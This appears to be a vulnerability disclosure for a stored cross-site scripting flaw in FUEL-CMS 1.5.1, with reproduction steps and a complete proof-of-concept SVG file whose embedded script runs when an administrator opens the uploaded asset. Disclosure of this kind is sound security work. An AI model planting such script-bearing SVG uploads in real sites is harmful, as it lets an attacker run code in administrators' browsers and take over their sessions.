FUEL-CMS
FUEL-CMS copied to clipboard
Published
20 hours ago •
daylightstudio
daylightstudio
A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1
A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .svg file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack
-
login as admin .in the Assets page
-
upload the malicious svg. the content of xss-cookie.svg :
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
-
back to Assets then wo can see xss-cookie.svg have been upload:
-
when user click the xss-cookie.svg it will trigger a XSS attack
